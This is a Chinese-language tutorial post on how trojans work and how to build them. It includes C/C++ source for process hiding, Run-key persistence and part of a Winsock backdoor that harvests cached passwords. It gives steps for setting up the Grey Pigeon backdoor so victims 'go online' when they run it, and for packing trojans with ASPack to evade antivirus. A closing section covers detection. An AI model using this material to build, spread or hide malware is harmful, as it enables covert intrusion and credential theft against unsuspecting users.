大家應(yīng)該對"木馬"這個名詞都不陌生，很多人感覺自己的“電腦系統(tǒng)變慢了”，“某些文件打不開了”，“打開網(wǎng)頁慢了”就懷疑自己是不是中"病毒木馬"了，其實這里要給大家解釋一下，"病毒"和"木馬"并不是一個統(tǒng)一概念，本質(zhì)上還是有一些區(qū)別的，木馬雖然屬于病毒中的一類，但是要單獨的從病毒類型中間剝離出來.獨立的稱之為"木馬"程序。

 

木馬和病毒的主要區(qū)別：

1、病毒是當(dāng)已感染的軟件運行時，這些惡性程序向計算機軟件添加代碼,修改程序的工作方式,從而獲取計算機的控制權(quán)。

2、木馬是指未經(jīng)用戶同意進行非授權(quán)操作的一種惡意程序。它們可能刪除硬盤上的數(shù)據(jù)，使系統(tǒng)癱瘓，盜取用戶資料等。木馬程序不能獨立侵入計算機，而是要依靠黑客來進行傳播，它們常常被偽裝成"正常"軟件進行散播。

3、他們最大的區(qū)別就是病毒具有感染性，而木馬一般不具有感染性，另外，病毒入侵后立刻有感覺 ，而木馬入侵后希望你沒有感覺，這樣才有利于她"開展工作"。

好的，大家理解了木馬和病毒的區(qū)別以后，今天咱們進入正題，闡述一下"木馬程序的原理與實現(xiàn)"！

一、 木馬程序簡介

1、 木馬的由來和定義

由來：

先講個故事，故事發(fā)生在在三千多年的古希臘，特洛伊的王子帕里斯愛上了斯巴達國王的妻子——絕世美女海倫。王子把她帶回了特洛伊古城，這時斯巴達王非常的憤怒，他找到了自己的哥哥，邁錫尼國王阿加伽門農(nóng)，請求他的的幫忙，阿伽門農(nóng)正好也希望征服特洛伊，于是借此機會建立了一支希臘聯(lián)軍討伐特洛伊古城。然后事情卻沒那么簡單，建軍圍攻了特洛伊古城9年仍未攻下，到了第十年，將領(lǐng)奧德修斯想出一計，將一批勇士藏于一批巨大的木馬腹內(nèi)，放在城外，大部隊則佯裝退軍。特洛伊人以為敵軍已退，就打開城門，打掃戰(zhàn)場，并把敵軍留下的那只木馬作為戰(zhàn)利品帶進了城中。全程飲酒狂飲，到了夜間，全城軍民進入夢鄉(xiāng)，而埋伏在木馬中的勇士們跳了出來，并打開城門四處放火，城外將士一擁而入，部隊里應(yīng)外合，攻下了特洛伊城池。后代稱這只大木馬為"特洛伊木馬"。后來，人們在寫文章時，就常用"特洛伊木馬"這一典故比作在敵方營壘內(nèi)埋下伏兵里應(yīng)外合的活動。

基礎(chǔ)定義：入侵者編寫入侵他人電腦并進行控制和破壞的程序，就叫做"木馬程序"。木馬與計算機網(wǎng)絡(luò)中常常要用到的遠程控制軟件有些相似，但由于遠程控制軟件是"善意"的控制，因此通常不具有隱蔽性；"木馬"則完全相反，木馬的目的是要達到 "偷竊"性的遠程控制，如果沒有很強的隱蔽性的話，那就是"毫無價值"的。

2、木馬的主要特點

（1）偽裝性：木馬總是偽裝成其他程序來迷惑管理員。

（2）潛伏性：木馬能夠毫無聲響地打開端口等待外部連接。

（3）隱蔽性：木馬的運行隱蔽，甚至使用任務(wù)管理器都看不出來。

（4）自動運行性：當(dāng)系統(tǒng)啟動時自動運行。

 

3、木馬被入侵者用來做什么？

（1）入侵

當(dāng)基于認(rèn)證和漏洞的入侵無法進行時，就需要考慮使用木馬入侵。

（2）留后門

由于木馬連接不需要系統(tǒng)認(rèn)證并且隱蔽性好，為了以后還能控制遠程主機，可以種木馬以留后門。

二、 木馬的工作原理

1、基本原理

木馬是一種基于遠程控制的黑客工具，一般來說，木馬程序包括客戶端和服務(wù)端兩部分。

 

其中，客戶端運行在入侵者的操作系統(tǒng)上，是入侵者控制目標(biāo)主機的平臺；服務(wù)端則是運行在目標(biāo)主機上，是被控制的平臺，一般發(fā)送給目標(biāo)主機的就是服務(wù)端文件。

 

木馬主要是依靠郵件附件、軟件下載、淫穢圖片、通信軟件等途徑進行傳播，然后，木馬通過一定的提示誘使目標(biāo)主機運行木馬的服務(wù)端程序，實現(xiàn)木馬的種植。

例如：入侵者偽裝成目標(biāo)主機用戶的朋友，發(fā)送了一張捆綁有木馬的電子賀卡，當(dāng)目標(biāo)主機打開賀卡后，屏幕上雖然會出現(xiàn)賀卡的畫面，但此時木馬服務(wù)端程序已經(jīng)在后臺運行了。

木馬的體積都非常小，大部分在幾KB到幾十KB之間。

當(dāng)目標(biāo)主機執(zhí)行了服務(wù)端程序之后，入侵者便可以通過客戶端程序與目標(biāo)主機的服務(wù)端建立連接，進而控制目標(biāo)主機。

對于通信協(xié)議的選擇，絕大多數(shù)木馬使用的是TCP/IP協(xié)議，但也有使用UDP協(xié)議的木馬。

木馬的服務(wù)端程序會盡可能地隱蔽行蹤，同時監(jiān)聽某個特定的端口，等待客戶端的連接；此外，服務(wù)端程序為了在每次重新啟動計算機后能正常運行，還需要通過修改注冊表等方法實現(xiàn)自啟動功能。

2、關(guān)鍵技術(shù)

(一) 隱藏技術(shù)

1) 程序隱藏

木馬程序可以利用程序捆綁的方式，將自己和正常的exe 文件進行捆綁。當(dāng)雙擊運行捆綁后的程序時，正常的exe 文件運行了。程序隱藏只能達到從表面上無法識別木馬程序的目的，但是可以通過任務(wù)管理器中發(fā)現(xiàn)木馬程序的蹤跡，這就需要木馬程序?qū)崿F(xiàn)進程隱藏。

2) 進程隱藏

隱藏木馬程序的進程顯示能防止用戶通過任務(wù)管理器查看到木馬程序的進程，從而提高木馬程序的隱蔽性。主要有兩種：

API攔截屬于進程偽隱藏方式通過利用Hook技術(shù)監(jiān)控并截獲系統(tǒng)中某些程序?qū)M程顯示的API 函數(shù)調(diào)用，然后修改函數(shù)返回的進程信息，將自己從結(jié)果中刪除，導(dǎo)致任務(wù)管理器等工具無法顯示該木馬進程。

遠程線程注入屬于進程真隱藏方式 主要是利用CreateRemoteThread函數(shù)在某一個目標(biāo)進程中創(chuàng)建遠程線程，共享目標(biāo)進程的地址空間，并獲得目標(biāo)進程的相關(guān)權(quán)限，從而修改目標(biāo)進程內(nèi)部數(shù)據(jù)和啟動DLL 木馬。

3) 通信隱藏

可以從通信連接的狀況中發(fā)現(xiàn)木馬程序的蹤跡。因此，很有必要實現(xiàn)木馬程序的通信隱藏。主要有兩種方式：

端口復(fù)用技術(shù)，它讓木馬服務(wù)端程序共享其他網(wǎng)絡(luò)程序已打開的端口和客戶端進行連接，從而防止重新開啟端口降低隱蔽性。關(guān)鍵之處在于，木馬程序應(yīng)增設(shè)一個數(shù)據(jù)包轉(zhuǎn)交判斷模塊，該模塊控制主機對數(shù)據(jù)報的轉(zhuǎn)交選擇。

利用ICMP和HTTP 協(xié)議，通常網(wǎng)絡(luò)防火墻和入侵檢測系統(tǒng)等安全設(shè)備只檢查ICMP報文的首部，對數(shù)據(jù)部分不做處理。因此，可以將木馬程序的通信數(shù)據(jù)隱藏在ICMP 報文格式的選項數(shù)據(jù)字段進行傳送，如把服務(wù)端程序向客戶端程序傳輸?shù)臄?shù)據(jù)偽裝成回顯請求報文，而把客戶端程序向服務(wù)端程序傳輸?shù)臄?shù)據(jù)偽裝成回顯應(yīng)答報文。這樣，就可以通過PINGPINGRESPONSE的方式在木馬服務(wù)端程序和客戶端程序之間建立起一個高效的秘密會話信道。利用ICMP 協(xié)議傳輸數(shù)據(jù)還有一個很大的優(yōu)點，即ICMP 屬于IP 層協(xié)議，它在傳輸數(shù)據(jù)時并不使用任何端口，從而具有更好的隱蔽性。

(二) 木馬自啟動技術(shù)

自啟動功能是必不可少的。自啟動可以保證木馬不會因為用戶的一次關(guān)機操作而徹底失去作用。下面介紹經(jīng)常使用的幾種方法。

1）在Win.ini中啟動

在Win.ini文件中的[windows]字段中有啟動命令"load="和"run="。默認(rèn)情況下，"="后面是空白的。這兩項分別是用來當(dāng)系統(tǒng)啟動時自動加載和運行的程序，如果木馬程序加載到這兩項中，那么系統(tǒng)啟動后即可自動地加載和運行。

2）在System.ini中啟動

在System.ini文件中的[boot]字段的shell=Explorer.exe中是木馬常用的隱藏加載的地方。木馬最慣用的伎倆就是把本應(yīng)是"Explorer.exe"變成自己的程序名，名稱偽裝成幾乎與Explorer.exe一樣，只需稍稍改"Explorer"的字母"l"改為數(shù)字"1"，或者把其中的"o"改為數(shù)字"0"，這些改變?nèi)绻蛔屑?xì)留意是很難被人發(fā)現(xiàn)的。或者是shell=Explorer.exe 的后面加上木馬程序的路徑，如：shell=Explorer.exe sample.exe，這里的sample.exe就是木馬服務(wù)端程序。

3）通過啟動組實現(xiàn)自啟動

啟動組是專門用來實現(xiàn)應(yīng)用程序自啟動的地方。啟動組文件夾的位置為"C:Documents and SettingsAll Users「開始」菜單程序啟動"。

[注："All Users"即對所有用戶都有作用]

4）通過注冊表啟動

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun，

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce，

HKEY_LOCAL_macHINESoftwareMicrosoftWindowsCurrentVersionRun，

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce

5）修改文件關(guān)聯(lián)

修改文件關(guān)聯(lián)是木馬常用手段。

例如：在正常情況下，txt文件的打開方式為notepad.exe文件，但一旦中了文件關(guān)聯(lián)木馬，則txt文件打開方式就會被修改為用木馬程序打開。例如著名的國產(chǎn)木馬冰河就是這樣。

6）捆綁文件

入侵者可以通過一些黑客軟件，如著名的Deception Binder，完成文件的捆綁，之后將這些捆綁文件放到網(wǎng)站、FTP、BT等資源下載場所，當(dāng)用戶下載并執(zhí)行捆綁文件，同時就啟動了木馬的服務(wù)端程序。

(三) 木馬植入技術(shù)

1）圖標(biāo)偽裝

黑客為了迷惑用戶，將木馬服務(wù)端程序的圖標(biāo)換成一些常見的文件類型的圖標(biāo)。

2）文件捆綁欺騙

文件捆綁就是通過使用文件捆綁器將木馬服務(wù)端和正常的文件捆綁在一起，達到欺騙對方從而運行捆綁的木馬程序的目的。

例如，把木馬服務(wù)端和某個游戲，或者flash文件捆綁成一個文件通過QQ或郵件發(fā)送給受害者。當(dāng)受害者對這個游戲或flash感興趣而下載到機器上，并開打了該文件，木馬程序就會悄悄運行。

3）定制端口

很多老式的木馬端口都是固定的，只要查一下特定的端口就知道感染了什么木馬。現(xiàn)在很多新式的木馬都加入了定制端口的功能，控制端用戶可以在1024～65535之間任選一個端口作為木馬端口，一般不選1024以下的端口，這就給判斷所感染的木馬類型帶來了麻煩。

4）擴展名欺騙

例如，圖像文件的擴展名不可能是.exe，而木馬程序的擴展名又必定是.exe，大多數(shù)用戶在看到擴展名為".exe"的文件時，就會很小心。于是設(shè)計者就將文件名進行一些改變，例如將"picture.tiff"更改為"pitcture.tiff.exe"，因為windows默認(rèn)是不顯示擴展名的，于是用戶就只能看到"picture.tiff"，很容易將其作為一個圖片文件而啟動。

三、 木馬的演變與種類

1、木馬的演變

從木馬的發(fā)展來看，把木馬分為五代。

1）第一代木馬

第一代的木馬功能相當(dāng)簡單，典型的有back orifice（簡稱：BO）、netSpy等，早就退出了歷史的舞臺。

第一代windows木馬只是一個將自己偽裝成特殊的程序或文件的軟件，如偽裝成一個用戶登錄窗口，當(dāng)用戶運行了木馬偽裝的登錄窗口，輸入用戶名和密碼后，木馬將自動記錄數(shù)據(jù)并轉(zhuǎn)發(fā)給入侵者。

2）第二代木馬

提供了幾乎所有能夠進行的遠程控制操作。國內(nèi)最具代表性的就是冰河木馬和廣外女生。

3）第三代木馬

繼續(xù)完善了連接與文件傳輸技術(shù)，并增加了木馬穿透防火墻的功能，并出現(xiàn)了"反彈端口"技術(shù)，如國內(nèi)的灰鴿子木馬軟件。

4）第四代木馬

利用了遠程線程插入技術(shù)，將木馬線程插入DLL線程中，使系統(tǒng)更加難以發(fā)現(xiàn)木馬的存在與入侵的連接方式。

5）第五代木馬

相對于第四代木馬，功能更加全面。而且應(yīng)用DLL技術(shù)后在目標(biāo)主機的計算機中不生成新的文件。

2、木馬的種類

 

1）破壞型

破壞并刪除文件，自動刪除電腦上的dll、EXE等文件，以達到使被感染的電腦癱瘓的目的。

2）密碼發(fā)送型

密碼發(fā)送型的木馬正是專門為了盜取被感染計算機上的密碼而編寫的，該木馬一旦被執(zhí)行，就會自動搜索內(nèi)存，Cache，臨時文件夾以及各種敏感密碼文件，一旦搜索到有用的密碼，木馬就會利用免費的電子郵件服務(wù)將密碼發(fā)送到指定的郵箱。從而達到獲取密碼的目的，所以這類木馬大多使用25號端口發(fā)送E-mail。

3）遠程訪問型

遠程訪問型木馬程序一般包括客戶端程序和服務(wù)端程序，在目標(biāo)主機上執(zhí)行了服務(wù)端程序之后，只要用戶知道目標(biāo)主機的IP地址或主機名，就可以與目標(biāo)主機連接，連接成功后，用戶通過客戶端程序提供的遠程操作功能就可以實現(xiàn)對目標(biāo)主機的監(jiān)視與控制。

大名鼎鼎的木馬冰河就是一個遠程訪問型特洛伊木馬。

4）鍵盤記錄木馬

記錄目標(biāo)主機用戶的鍵盤操作且將鍵盤操作記錄在文件中，入侵者可以獲取這些文件并在文件中獲取諸如密碼等有用的信息。

對于這種類型的木馬，郵件發(fā)送功能也是必不可少的。

5）Dos攻擊木馬

Dos全名是Denial of service（拒絕服務(wù)）。它故意攻擊網(wǎng)絡(luò)協(xié)議的缺陷或直接通過某種手段耗盡被攻擊對象的資源，目的是讓目標(biāo)計算機或網(wǎng)絡(luò)無法提供正常的服務(wù)或資源訪問，使目標(biāo)系統(tǒng)服務(wù)停止響應(yīng)甚至崩潰。

當(dāng)黑客侵入一臺計算機并種上了DOS攻擊木馬后，日后這臺計算機就成了黑客DOS攻擊的最得力的幫手。黑客控制的計算機數(shù)量越多，發(fā)動DOS攻擊取得成功的概率就越大，所以，這種木馬的危害不是體現(xiàn)在被感染的計算機上，而是體現(xiàn)在攻擊者可以利用它來攻擊網(wǎng)絡(luò)上的其他的計算機。

全名是 ()，很多攻擊源一起攻擊某臺服務(wù)器就組成了DDoS攻擊。

6）代理木馬

給被控制的肉雞種上代理木馬，讓其變成入侵者發(fā)動攻擊的跳板就是代理木馬最重要的任務(wù)。通過代理木馬，入侵者可以在匿名的情況下使用Telnet等程序，從而隱蔽自己的蹤跡。

7）FTP木馬

這種木馬可能是最簡單和古老的木馬了，它的惟一功能就是打開21端口，等待用戶連接。現(xiàn)在新FTP木馬還加上了密碼功能，這樣，只有攻擊者本人才知道正確的密碼，從而進入對方的計算機。

8）程序殺手木馬

常見的查殺木馬軟件有瑞星，Norton Anti-Virus及木馬清除大師等。程序殺手木馬的功能就是關(guān)閉目標(biāo)機器上運行的木馬查殺程序，讓木馬更好地發(fā)揮作用。

9）反彈端口型木馬

木馬開發(fā)者在分析了防火墻的特性后發(fā)現(xiàn) ：防火墻對于連入的鏈接往往會進行非常嚴(yán)格的過濾，但是對于連出的鏈接卻疏于防范。

于是，與一般的木馬相反，反彈端口型木馬在服務(wù)端 (被控制端)使用主動端口，客戶端 (控制端)使用被動端口。

木馬定時監(jiān)測客戶端（控制端）的存在，發(fā)現(xiàn)客戶端（控制端）上線立即主動連接控制端打開的主動端口；

為了隱蔽起見，客戶端 (控制端)的被動端口一般設(shè)置為80（瀏覽網(wǎng)頁必須開的端口），這樣，即使用戶使用端口掃描軟件檢查自己的端口，發(fā)現(xiàn)的也是類似TCP UserIP:1026 ControllerIP:80 ESTABLISHED的情況，不明真相的用戶就會以為自己在瀏覽網(wǎng)頁，并且，防火墻一般不會禁止用戶向外連接80端口。

主流木馬：

 

四、 木馬程序的實現(xiàn)

1、 木馬中的關(guān)鍵技術(shù)實現(xiàn)（附源碼）

1) 木馬程序隱藏技術(shù)

通過注冊服務(wù)程序，實現(xiàn)進程偽隱藏的方法：

WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
 {
 try
 {
 Dword dwVersion = GetVersion();//取得Windows的版本號
 if (dwVersion >= 0x80000000) // Windows 9x隱藏任務(wù)列表
 {
 int (CALLBACK *rsp)(DWORD,DWORD);
 HINSTANCE dll=LoadLibrary("KERNEL32.DLL");//裝入KERNEL32.DLL
 rsp=(int(CALLBACK *)(DWORD,DWORD))GetProcAddress(dll,"RegisterServiceProcess");//找到RegisterServiceProcess的入口
 rsp(NULL,1);//注冊服務(wù)
 FreeLibrary(dll);//釋放DLL模塊
 }
 }
 catch (Exception &exception)//處理異常事件
 {
 //處理異常事件
 }
 return 0;
}　

2) 程序的自啟動運行技術(shù)

展示一段通過修改HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersions/Run鍵值來實現(xiàn)自啟動的程序：

HKEY hkey;
AnsiString NewProgramName=AnsiString(sys)+AnsiString("+PName/">//")+PName
unsigned long k;
k=REG_OPENED_EXISTING_KEY;
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN//",
0L,
NULL,
REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS|KEY_SET_VALUE,
NULL,
&hkey,&k);
RegSetValueEx(hkey,
"BackGroup",
0,
REG_SZ,
NewProgramName.c_str(),
NewProgramName.Length());
RegCloseKey(hkey);
if (int(ShellExecute(Handle,
"open",
NewProgramName.c_str(),
NULL,
NULL,
SW_HIDE))>32)
{
WantClose=true;
Close();
}
else
{
HKEY hkey;
unsigned long k;
k=REG_OPENED_EXISTING_KEY;
long a=RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN",
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_SET_VALUE,NULL,
&hkey,&k);
RegSetValueEx(hkey,
"BackGroup",
0,
REG_SZ,
ProgramName.c_str(),
ProgramName.Length());
int num=0;
char str[20];
DWORD lth=20;
DWORD type;
char strv[255];
DWORD vl=254;
DWORD Suc;
do{
Suc=RegEnumValue(HKEY_LOCAL_MACHINE,
(DWORD)num,str,
NULL,
&type,
strv,&vl);
if (strcmp(str,"BGroup")==0)
{
DeleteFile(AnsiString(strv));
RegDeleteValue(HKEY_LOCAL_MACHINE,"BGroup");
break;
}
}while(Suc== ERROR_SUCCESS);
RegCloseKey(hkey);
}

2、 WINSOCK編程完成一個簡單"木馬程序"實現(xiàn)（附源碼）

用異步SOCKET方式, 直接調(diào)用WINSOCK API,WIN SDK寫的木馬(VC,C++ BUILDER下均編譯,調(diào)試通過),無須客戶端,編譯后才幾十K.實現(xiàn)了些 主要功能,文件瀏覽,上傳,下載(均支持統(tǒng)配符),改變目錄,獲取系統(tǒng)信息,從CACHE取密碼, 執(zhí)行文件,顯示進程, 發(fā)送消息,關(guān)機, 還有些控制功能。

源代碼如下：

#include <windows.h> 
#include <winsock.h> 
#include <mmsystem.h> 
#pragma hdrstop 
#include <condefs.h> 
#pragma argsused 
#define RUN "//WinMon32.exe" 
//注冊服務(wù) 
#define SERVICE_PROC 1 
//卸載服務(wù) 
#define UNSERVICE_PROC 0 
#define TH32CS_SNAppROCESS 0x00000002 
#define PROCESS_HANDLE_NAME 255 
//緩沖區(qū)長度 
#define dwBuffSize 2048 
//命令行長度 
#define dwComm 50 
#define PORT 9102 
#define WM_SOCKET WM_USER+1 
#define PROMPT "LanLan://>" 
DWORD dwVersion=MAKEWORD(1,1); 
DWORD dwFlag=TRUE; 
WSADATA wsaData; 
SOCKET CreateSock,NewSock; 
SOCKADDR_IN Sock_in,NewSock_in; 
LPTSTR szReadBuff,Ob,TempBuff; 
int addrlen; 
//CACHE PASSWORD結(jié)構(gòu) 
typedef struct tagPASSWORD_CACHE_ENTRY { 
WORD cbEntry; 
WORD cbResource; 
WORD cbPassword; 
BYTE iEntry; 
BYTE nType; 
char abResource[1]; 
} PASSWORD_CACHE_ENTRY; 
typedef BOOL (WINAPI *CACHECALLBACK)(PASSWORD_CACHE_ENTRY *pce,DWORD); 
//CACHE PASSWORD函數(shù)原形 
typedef WORD (WINAPI *PWNetEnumCachedPasswords)( 
LPSTR pbPrefix, 
DWORD cbPrefix, 
DWORD nType, 
CACHECALLBACK pfnCallback, 
DWORD UNKNOWN 
); 
//TOOLHELP32 結(jié)構(gòu) 
typedef struct tagPROCESSENTRY32 
{ 
DWORD dwSize; 
DWORD cntUsage; 
DWORD th32ProcessID; 
DWORD th32DefaultHeapID; 
DWORD th32ModuleID; 
DWORD cntThreads; 
DWORD th32ParentProcessID; 
LONG pcPriClassBase; 
DWORD dwFlags; 
TCHAR szExeFile[MAX_PATH]; 
} PROCESSENTRY32; 
typedef PROCESSENTRY32 * LPPROCESSENTRY32; 

注：由于文章篇幅限制剩余源碼可以私信我單獨發(fā)送

3、 利用"灰鴿子"工具軟件制作木馬

灰鴿子簡介： 灰鴿子是國內(nèi)一款著名后門。比起前輩冰河、黑洞來，灰鴿子可以說是國內(nèi)后門的集大成者。其豐富而強大的功能、靈活多變的操作、良好的隱藏性使其他后門都相形見絀。客戶端簡易便捷的操作使剛?cè)腴T的初學(xué)者都能充當(dāng)黑客。當(dāng)使用在合法情況下時，灰鴿子是一款優(yōu)秀的遠程控制軟件。但如果拿它做一些非法的事，灰鴿子就成了很強大的黑客工具。

方法如下：

首先，在電腦上安裝灰鴿子，然后進入其主頁面

 

接下來我們點自動上線FTP服務(wù)器就是你FTP空間的地址

 

下來點配置服務(wù)程序，先點自動上線設(shè)置，IP通知那里添上你FTP在HTTP的訪問地址加上你放IP文件的地址

 

最終我們要把服務(wù)器配置成功

 

這時你只要將自己生成的木馬給別人運行就可以了，這樣他就會上線如下圖

如果設(shè)了密碼就要輸入連接密碼哦

 

五、 如何給易被查殺的木馬"加殼"

大家知道現(xiàn)在的病毒查殺軟件對已知的木馬程序很容易就查殺掉，所以當(dāng)你好不容易制作的木馬傳播出去后，輕松就被客戶端查殺掉了，這時我們就要利用加殼技術(shù)，給木馬套個"殼"防止被殺

1、什么是加殼？

加殼：是一種通過一系列數(shù)學(xué)運算，將可執(zhí)行程序文件（EXE）或動態(tài)鏈接庫文件（DLL）的編碼進行改變（目前加殼軟件還可以壓縮、加密），以達到縮小文件體積或加密程序編碼的目的。當(dāng)被加殼的程序運行時，外殼程序先被執(zhí)行，然后由這個外殼程序負(fù)責(zé)將用戶原有的程序在內(nèi)存中解壓縮，并把控制權(quán)交還給脫殼后的真正程序。

常見到的壓縮殼有"UPX"、"北斗程序壓縮"、"ASPack"等，加密殼有"PE-Armor"、"ASProtect"等等。

2、利用ASPack加殼防止木馬被查殺：

步驟1：下載并運行ASPack2.28軟件，即可打開ASPack 2.28主窗口，如圖1-69所示。在"選項"選項卡中勾選"壓縮資源"、"加載后立即運行"及"使用Windows DLL 加載器"等復(fù)選項，如下圖所示：

 

步驟2：選擇"打開文件"選項卡，單擊"打開"按鈕，即可打開"選擇要壓縮的文件"對話框，在其中選擇需要加殼的文件，如下圖所示。

 

步驟3：單擊"打開"按鈕，即可開始進行壓縮，如下圖所示。在"壓縮"選項卡中可進行壓縮、測試操作，并在完成之后生成加殼后的文件。

 

使用方法比較簡單，可以自行測試一下效果！

六、 如何識別與查殺木馬程序

識別方法：

1、檢查網(wǎng)絡(luò)連接情況

 

由于不少木馬會主動偵聽端口，或者會連接特定的IP和端口，所以我們可以在沒有正常程序連接網(wǎng)絡(luò)的情況下，通過檢查網(wǎng)絡(luò)連情情況來發(fā)現(xiàn)木馬的存在。

具體的步驟是點擊"開始" "運行" "cmd"，然后輸入netstat -an這個命令能看到所有和自己電腦建立連接的IP以及自己電腦偵聽的端口，它包含四個部分——proto（連接方式）、local address（本地連接地址）、foreign address（和本地建立連接的地址）、state（當(dāng)前端口狀態(tài)）。通過這個命令的詳細(xì)信息，我們就可以完全監(jiān)控電腦的網(wǎng)絡(luò)連接情況。

　2、查看目前運行的服務(wù)

 

服務(wù)是很多木馬用來保持自己在系統(tǒng)中永遠能處于運行狀態(tài)的方法之一。我們可以通過點擊"開始" "運行" "cmd"，然后輸入"net start"來查看系統(tǒng)中究竟有什么服務(wù)在開啟，如果發(fā)現(xiàn)了不是自己開放的服務(wù)，我們可以進入"服務(wù)"管理工具中的"服務(wù)"，找到相應(yīng)的服務(wù)，停止并禁用它。

　3、檢查系統(tǒng)啟動項

 

由于注冊表對于普通用戶來說比較復(fù)雜，木馬常常喜歡隱藏在這里。檢查注冊表啟動項的方法如下：點擊"開始" "運行" "regedit"，然后檢查HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值；HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值；HKEY-USERS.DefaultSoftwareMicrosoftWindowsCurrentVersion下所有以"run"開頭的鍵值。

Windows安裝目錄下的System.ini也是木馬喜歡隱蔽的地方。打開這個文件看看，在該文件的[boot]字段中，是不是有shell=Explorer.exe file.exe這樣的內(nèi)容，如有這樣的內(nèi)容，那這里的file.exe就是木馬程序了！

　4、檢查系統(tǒng)帳戶

 

惡意的攻擊者喜在電腦中留有一個賬戶的方法來控制你的計算機。他們采用的方法就是激活一個系統(tǒng)中的默認(rèn)賬戶，但這個賬戶卻很少用的，然后把這個賬戶的權(quán)限提升為管理員權(quán)限，這個帳戶將是系統(tǒng)中最大的安全隱患。惡意的攻擊者可以通過這個賬戶任意地控制你的計算機。針對這種情況，可以用以下方法對賬戶進行檢測。

點擊"開始";"運行" "cmd"，然后在命令行下輸入net user，查看計算機上有些什么用戶，然后再使用"net user 用戶名"查看這個用戶是屬于什么權(quán)限的，一般除了Administrator是administrators組的，其他都不應(yīng)該屬于administrators組，如果你發(fā)現(xiàn)一個系統(tǒng)內(nèi)置的用戶是屬于administrators組的，那幾乎可以肯定你被入侵了。快使用"net user用戶名/del"來刪掉這個用戶吧！

5、利用系統(tǒng)進程識別木馬

任何病毒和木馬存在于系統(tǒng)中，都無法徹底和進程脫離關(guān)系，即使采用了隱藏技術(shù)，也還是能夠從進程中找到蛛絲馬跡，因此，查看系統(tǒng)中活動的進程成為我們檢測病毒木馬最直接的方法。

 

木馬常利用的系統(tǒng)進程有：svchost.exe、explorer.exe、iexplore.exe、winLOGOn.exe等進程。

（1）svchost.exe

常被病毒冒充的進程名有：svch0st.exe、schvost.exe、scvhost.exe。隨著Windows系統(tǒng)服務(wù)不斷增多，為了節(jié)省系統(tǒng)資源，微軟把很多服務(wù)做成共享方式，交由svchost.exe進程來啟動。而系統(tǒng)服務(wù)是以動態(tài)鏈接庫(DLL)形式實現(xiàn)的，它們把可執(zhí)行程序指向scvhost，由cvhost調(diào)用相應(yīng)服務(wù)的動態(tài)鏈接庫來啟動服務(wù)。

我們可以打開"控制面板"→"治理工具"→服務(wù)，雙擊其中"ClipBook"服務(wù)，在其屬性面板中可以發(fā)現(xiàn)對應(yīng)的可執(zhí)行文件路徑為"C:WINDOWSsystem32clipsrv.exe"。再雙擊"Alerter"服務(wù)，可以發(fā)現(xiàn)其可執(zhí)行文件路徑為"C:WINDOWSsystem32svchost.exe -k LocalService"，而"Server"服務(wù)的可執(zhí)行文件路徑為"C:WINDOWSsystem32svchost.exe -k netsvcs"。正是通過這種調(diào)用，可以省下不少系統(tǒng)資源，因此系統(tǒng)中出現(xiàn)多個svchost.exe，其實只是系統(tǒng)的服務(wù)而已。

在Windows系統(tǒng)中一般存在2個svchost.exe進程，一個是RPcss(RemoteProcedureCall)服務(wù)進程，另外一個則是由很多服務(wù)共享的一個svchost.exe;而在WindowsXP中，則一般有4個以上的svchost.exe服務(wù)進程。假如svchost.exe進程的數(shù)量多于5個，就要小心了，很可能是病毒假冒的，檢測方法也很簡單，使用一些進程治理工具，例如Windows優(yōu)化大師的進程治理功能，查看svchost.exe的可執(zhí)行文件路徑，假如在"C:WINDOWSsystem32"目錄外，那么就可以判定是病毒了。

（2）explorer.exe

常被病毒冒充的進程名有：iexplorer.exe、expiorer.exe、explore.exe。explorer.exe就是我們經(jīng)常會用到的"資源治理器"。假如在"任務(wù)治理器"中將explorer.exe進程結(jié)束，那么包括任務(wù)欄、桌面、以及打開的文件都會統(tǒng)統(tǒng)消失，單擊"任務(wù)治理器"→"文件"→"新建任務(wù)"，輸入"explorer.exe"后，消失的東西又重新回來了。explorer.exe進程的作用就是讓我們治理計算機中的資源。

explorer.exe進程默認(rèn)是和系統(tǒng)一起啟動的，其對應(yīng)可執(zhí)行文件的路徑為"C:Windows"目錄，除此之外則為病毒。

（3）iexplore.exe

常被病毒冒充的進程名有：iexplorer.exe、iexploer.exeiexplorer.exe進程和上文中的explorer.exe進程名很相像，因此比較輕易搞混，其實iexplorer.exe是Microsoft Internet Explorer所產(chǎn)生的進程，也就是我們平時使用的IE瀏覽器。知道作用后辨認(rèn)起來應(yīng)該就比較輕易了，iexplorer.exe進程名的開頭為"ie"，就是IE瀏覽器的意思。

iexplore.exe進程對應(yīng)的可執(zhí)行程序位于C:ProgramFilesInternetExplorer目錄中，存在于其他目錄則為病毒，除非你將該文件夾進行了轉(zhuǎn)移。此外，有時我們會發(fā)現(xiàn)沒有打開IE瀏覽器的情況下，系統(tǒng)中仍然存在iexplore.exe進程，這要分兩種情況：

1) 病毒假冒iexplore.exe進程名。

2) 病毒偷偷在后臺通過iexplore.exe干壞事。

（4）rundll32.exe

常被病毒冒充的進程名有：rundl132.exe、rundl32.exe。rundll32.exe在系統(tǒng)中的作用是執(zhí)行DLL文件中的內(nèi)部函數(shù)，系統(tǒng)中存在多少個Rundll32.exe進程，就表示Rundll32.exe啟動了多少個的DLL文件。其實rundll32.exe我們是會經(jīng)常用到的，他可以控制系統(tǒng)中的一些dll文件，舉個例子，在"命令提示符"中輸入"rundll32.exe user32.dll,LockWorkStation"，回車后，系統(tǒng)就會快速切換到登錄界面了。rundll32.exe的路徑為"C:Windowssystem32"，在別的目錄則可以判定是病毒。

（5）spoolsv.exe

